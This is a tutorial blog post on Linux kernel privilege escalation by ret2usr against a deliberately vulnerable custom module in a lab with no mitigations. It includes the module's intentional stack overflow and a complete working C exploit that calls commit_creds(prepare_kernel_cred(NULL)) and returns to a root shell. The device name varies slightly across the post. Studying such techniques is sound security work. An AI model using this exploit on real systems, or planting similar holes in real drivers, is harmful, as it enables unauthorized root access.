Linux Kernel Exploitation - ret2usr
The goal in userland exploitation is to gain code execution and trick the process to spawn a shell. In kernelland exploitation the main goal is to change the privileges of the current process.
The next section shows an easy vulnerability in a custom kernel module, which is a stack-based bufferoverlow, and desribes how to exploit that vulnerability.
Note No exploit mitigations like KASLR, PTI, SMEP or SMAP are in place. All those mitigations and how to exploit them will be explained in following posts.
prerequisite
Here can description be found on how to build the debugging environment: Linux Kernel Exploitation - Environment. That environment is used in this example. The init
script should be modified to start a shell with root privileges, during the development process.
#!/bin/sh
for i in `find ".ko" /modules`
do
insmod $i
done
mount -t proc none /proc
mount -t sysfs none /sys
mdev -s
chmod 666 /dev/stack_bof
exec /bin/sh
#setuidgid 1000 /bin/sh
If the exploit is finished, the init
script should be changed to started the shell with less permissions.
#!/bin/sh
for i in `find ".ko" /modules`
do
insmod $i
done
mount -t proc none /proc
mount -t sysfs none /sys
mdev -s
chmod 666 /dev/stack_bof
#exec /bin/sh
setuidgid 1000 /bin/sh
vulnerability
The following excerpt shows the source code of the kernel module what is used in this blogpost to demonstrate the exploitation approach:
#include <linux/compiler.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/module.h>
#include <linux/uaccess.h>
MODULE_DESCRIPTION("vuln1");
MODULE_AUTHOR("sash");
MODULE_LICENSE("GPL");
#define IOCTL_VULN1_WRITE 4141
static int vuln1_open(struct inode *inode, struct file *file)
{
return 0;
}
static int vuln1_release(struct inode *inodep, struct file *filp)
{
return 0;
}
static noinline int vuln1_do_breakstuff(unsigned long addr)
{
char buffer[256];
volatile int size = 512;
return _copy_from_user(&buffer, (void __user *)addr, size);
}
static long vuln1_ioctl(struct file *fd, unsigned int cmd, unsigned long value)
{
long to_return;
switch (cmd) {
case IOCTL_VULN1_WRITE:
to_return = vuln1_do_breakstuff(value);
break;
default:
to_return = -EINVAL;
break;
}
return to_return;
}
static const struct file_operations vuln1_file_ops = {
.owner = THIS_MODULE,
.open = vuln1_open,
.unlocked_ioctl = vuln1_ioctl,
.release = vuln1_release,
.llseek = no_llseek,
};
struct miscdevice vuln1_device = {
.minor = MISC_DYNAMIC_MINOR,
.name = "vuln",
.fops = &vuln1_file_ops,
.mode = 0666,
};
module_misc_device(vuln1_device);
The function vuln1_ioctl
is called when the ioctl
system call is used. The modules provides one action (IOCTL_VULN1_WRITE
) for the system call which calls internally vuln1_do_breakstuff
. The function vuln1_do_breakstuff
has a very obvious vulnerability. It reads 512
bytes from userspace into a buffer of 256
bytes. The function calls _copy_from_user
instead of copy_from_user
in order to prevent the implemented security checks mitigate the buffer overflow.
Note In order to compile the kernel module, the explanation here can be used. If that is not an option, all resourcen can be downloaded from here.
The module creates the miscellaneous device /dev/vuln
which can be opened with open
and accessed with ioctl()
syscall.
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#define IOCTL_VULN1_WRITE 4141
void ioctl_write(int fd){
char buffer[512];
memset(buffer, 0x41, sizeof(buffer));
ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
}
void main()
{
int fd;
fd = open("/dev/vuln", 0);
if (fd < 0) {
printf ("Cannot open device file");
exit(-1);
}
ioctl_write(fd);
close(fd);
}
The device is opened in the main
function. The function ioctl
write shows how to write data to the device using the ioctl
syscall with the IOCTL_VULN1_WRITE
command.
approach
As mentioned before, in userland exploitation usually the exploit jumps to a shellcode that pops a shell. In kernelland, the ret2usr approach is the simples kernelland approach which does not jump to a real shellcode, but jumps to kernelland functions to change the privileges to root and at the end back to userland.
In this example the most common approach is used:
- Obtain
root
privileges - Restore user context and switch to userland and to a provided function pointer
1. obtain root privileges
The common approach to obtain root privileges is to call prepare_kernel_cred
and commit_creds
. The following part explains what the function does and why does it make sense to use those functions in the exploit.
In the kernel every task (known as process in Userland) is represented by a task_struct
structure. That structure holds all information about a task. One information that is stored in that struct, is the information about the credentials of the task. That is stored in the struct struct cred
and referenced by the pointer struct cred *cred
that is part of task_struct
.
struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
/*
* For reasons of header soup (see current_thread_info()), this
* must be the first element of task_struct.
*/
struct thread_info thread_info;
#endif
/* -1 unrunnable, 0 runnable, >0 stopped: */
volatile long state;
/*
* This begins the randomizable portion of task_struct. Only
* scheduling-critical items should be added above here.
*/
randomized_struct_fields_start
void *stack;
refcount_t usage;
/* Per task flags (PF_*), defined further below: */
unsigned int flags;
unsigned int ptrace;
[...]
/* Process credentials: */
/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;
/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;
/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
[...]
};
As the following excerpt shows, the struct cred
contains all IDs like uid
, gid
, euid
and so on.
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct ucounts *ucounts;
struct group_info *group_info; /* supplementary groups for euid/fsgid */
/* RCU deletion */
union {
int non_rcu; /* Can we skip RCU deletion? */
struct rcu_head rcu; /* RCU deletion hook */
};
} __randomize_layout;
The function prepare_kernel_cred
returns a reference to a struct cred
.
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;
new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;
kdebug("prepare_kernel_cred() alloc %p", new);
if (daemon)
old = get_task_cred(daemon);
else
old = get_cred(&init_cred);
validate_creds(old);
*new = *old;
new->non_rcu = 0;
atomic_set(&new->usage, 1);
set_cred_subscribers(new, 0);
get_uid(new->user);
get_user_ns(new->user_ns);
get_group_info(new->group_info);
#ifdef CONFIG_KEYS
new->session_keyring = NULL;
new->process_keyring = NULL;
new->thread_keyring = NULL;
new->request_key_auth = NULL;
new->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
#endif
#ifdef CONFIG_SECURITY
new->security = NULL;
#endif
new->ucounts = get_ucounts(new->ucounts);
if (!new->ucounts)
goto error;
if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
goto error;
put_cred(old);
validate_creds(new);
return new;
error:
put_cred(new);
put_cred(old);
return NULL;
}
EXPORT_SYMBOL(prepare_kernel_cred);
The function expects an argument which is a pointer to a struct task_struct
, but it can be null
. If the argument is not null
, it is used to read the credentials (struct cred
) from that task. If the argument is null
, a reference to init_cred
is used. init_cred
is a prepared struct cred
that is used for the initial task and represents root
.
struct cred init_cred = {
.usage = ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
.subscribers = ATOMIC_INIT(2),
.magic = CRED_MAGIC,
#endif
.uid = GLOBAL_ROOT_UID,
.gid = GLOBAL_ROOT_GID,
.suid = GLOBAL_ROOT_UID,
.sgid = GLOBAL_ROOT_GID,
.euid = GLOBAL_ROOT_UID,
.egid = GLOBAL_ROOT_GID,
.fsuid = GLOBAL_ROOT_UID,
.fsgid = GLOBAL_ROOT_GID,
.securebits = SECUREBITS_DEFAULT,
.cap_inheritable = CAP_EMPTY_SET,
.cap_permitted = CAP_FULL_SET,
.cap_effective = CAP_FULL_SET,
.cap_bset = CAP_FULL_SET,
.user = INIT_USER,
.user_ns = &init_user_ns,
.group_info = &init_groups,
.ucounts = &init_ucounts,
};
That means, if the function is called that way prepare_kernel_cred(null)
, it returns a reference to a struct cred
structure with root permission. In order to assign those new credentials, the function commit_creds
needs to be used. That function excepts the new credentials as argument and assign those to the current task.
In order to accomplish setting root privileges to the current task, it is enough to perform a such a call commit_creds(perpare_kernel_creds(null));
.
2. restore user context and switch to userland
The last step of the exploit execution is to jump to a function located in userland. If the exploits jumps to the userland function immediately after obtaining root privileges, all important registers like RSP
, RFLAGS
, or the segemnt registers CS
and SS
points still to kernelland. Those segments and even the stack are not accessible from userland. Therefore, is has to be restored by the exploit manually. In order to accomplish that, the user context (all necessary registers) have to be stored before switching to kernelland (ioctl
call).
unsigned long u_cs;
unsigned long u_ss;
unsigned long u_rsp;
unsigned long u_rflags;
unsigned long u_rip;
void save_state() {
__asm__(
".intel_syntax noprefix;"
"mov u_cs, cs;"
"mov u_ss, ss;"
"mov u_rsp, rsp;"
"pushf;"
"pop u_rflags;"
".att_syntax;"
);
u_rip = (unsigned long)&start_sh;
}
The current RIP
is not stored. After the priviledge escalation it makes sense to call a function that executes everything which should be executed with higher privileges. In this example a function is used that starts a shell.
void start_sh() {
char *args[] = {"/bin/sh", "-i", NULL};
execve("/bin/sh", args, NULL);
}
The GS
register does not need to be saved due to the possiblity to restore it with the swapgs
instruction. swapgs
is a privileged instruction and swaps the gs register from kernelland to userland and vice versa.
Since all necessary values are stored, those can be restored after the call to commit_creds
.
void restore_state() {
__asm__(
".intel_syntax noprefix;"
"swapgs;""push u_ss;" // restore gs reg and push all
"push u_rsp;" // other values to the stack
"push u_rflags;"
"push u_cs;"
"push u_rip;" // points to start_sh
"iretq;"
".att_syntax;"
);
}
All stored values are push onto the stack, because they are restored by the iretq
instruction automatically. That instruction is a return from a system call, so similar to ret
for a function call. Due to the iretq
call, it returns from the system call and switch back to userland. Since the stored user_rip
points to start_sh
, the function will be executed after the return.
exploit
Now put everything together for a working exploit.
- Find the address of
commit_creds
andprepare_kernel_cred
- Save user state
- Overflow the buffer and overwrite the return address with a function that does:
- Call
commit_creds(prepare_kernel_cred(null))
- Restore user state and call
iretq
All necessary functions are shown above. The only things what are missing, the addresses of the commit_creds
and prepare_kernel_cred
functions, and the offset from the beginning of the buffer to the return address are needed.
The addresses of the functions can be found in several ways:
- Looking for the addreses in
/proc/kallsyms
- Printing the addresses in gdb
To read the kernel symbols from /proc/kallsyms
root permissions are necessary.
# cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff810d2950 T prepare_kernel_cred
# cat /proc/kallsyms | grep commit_creds
ffffffff810d26f0 T commit_creds
The offset can easily be read from the disassembly of the function:
;-- vuln1_do_breakstuff:
; CALL XREF from sub.vuln1_ioctl_80000f0 @ 0x8000104(x)
┌ 50: sub.vuln1_do_breakstuff_80000b0 ();
│ ; var int64_t var_100h @ rbp-0x100
│ ; var int64_t var_104h @ rbp-0x104
│ 0x080000b0 e800000000 call __fentry__ ; RELOC 32 __fentry__
│ ; CALL XREF from sub.vuln1_do_breakstuff_80000b0 @ 0x80000b0(x)
│ 0x080000b5 55 push rbp
│ 0x080000b6 4889fe mov rsi, rdi
│ 0x080000b9 4889e5 mov rbp, rsp
│ 0x080000bc 4881ec0801.. sub rsp, 0x108
│ 0x080000c3 c785fcfeff.. mov dword [var_104h], 0x200 ; 512
│ 0x080000cd 486395fcfe.. movsxd rdx, dword [var_104h]
│ 0x080000d4 488dbd00ff.. lea rdi, [var_100h]
│ 0x080000db e800000000 call _copy_from_user ; RELOC 32 _copy_from_user
│ ; CALL XREF from sub.vuln1_do_breakstuff_80000b0 @ 0x80000db(x)
│ 0x080000e0 c9 leave
└ 0x080000e1 c3 ret
At offset 0x080000d4
the address of the buffer is moved into RDI
as the first argument of the function call _copy_from_user
. So the buffer is addressed with RBP-0x100
. That means, the offset to RBP
is 0x100
. RBP
points the the saved framepointer. The value right after the saved framepointer is the return address, which means, that the offset from the beginning of the buffer to the return address it 0x108
.
The following excerpt shows the exploit:
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#define IOCTL_VULN1_WRITE 4141
#define COMMIT_CREDS_ADDRESS 0xffffffff810d26f0ul
#define PREPARE_KERNEL_CRED_ADDRESS 0xffffffff810d2950ul
typedef int (* t_commit_creds)(void *);
typedef void *(* t_prepare_kernel_cred)(void *);
t_commit_creds commit_creds = (t_commit_creds)COMMIT_CREDS_ADDRESS;
t_prepare_kernel_cred prepare_kernel_cred = (t_prepare_kernel_cred)PREPARE_KERNEL_CRED_ADDRESS;
unsigned long u_cs;
unsigned long u_ss;
unsigned long u_rsp;
unsigned long u_rflags;
unsigned long u_rip;
void start_sh() {
char *args[] = {"/bin/sh", "-i", NULL};
execve("/bin/sh", args, NULL);
}
void save_state() {
__asm__(
".intel_syntax noprefix;"
"mov u_cs, cs;"
"mov u_ss, ss;"
"mov u_rsp, rsp;"
"pushf;"
"pop u_rflags;"
".att_syntax;"
);
u_rip = (unsigned long)&start_sh;
}
void restore_state() {
__asm__(
".intel_syntax noprefix;"
"swapgs;""push u_ss;" // restore gs reg and push all
"push u_rsp;" // other values to the stack
"push u_rflags;"
"push u_cs;"
"push u_rip;" // points to start_sh
"iretq;"
".att_syntax;"
);
}
void exploit(){
commit_creds(prepare_kernel_cred(NULL));
restore_state();
}
void ioctl_write(int fd){
char buffer[512];
memset(buffer, 0x41, sizeof(buffer));
// overwrite return address
*(unsigned long *)&buffer[0x108] = (unsigned long) &exploit;
//save user state
save_state();
// ioctl syscall
ioctl(fd, IOCTL_VULN1_WRITE, &buffer);
}
void main()
{
int fd;
// open the device
fd = open("/dev/vuln1", 0);
if (fd < 0) {
printf ("Cannot open device file");
exit(-1);
}
ioctl_write(fd);
close(fd);
}
The exploit needed to be statically compiled with gcc -static vuln1_exploit.c -o vuln1_exploit
and then put into the initramfs file.
Furthermore, chmod 666 /dev/vuln
should be added to the init
script in order to ensure that the device can be accessed by a normal user.
All materials can be found on https://github.com/sashs/linux_kernel_exploitation.
resources
- ioctl - https://docs.kernel.org/driver-api/ioctl.html
- Writing misc device drivers - https://embetronicx.com/tutorials/linux/device-drivers/misc-device-driver/
- module_misc_device - https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/miscdevice.h#L105
- https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/sched.h#L657
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L449
- https://elixir.bootlin.com/linux/v5.13.19/source/include/linux/cred.h#L110
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L719
- https://elixir.bootlin.com/linux/v5.13.19/source/kernel/cred.c#L41
- swapgs - https://www.kernel.org/doc/Documentation/x86/entry_64.txt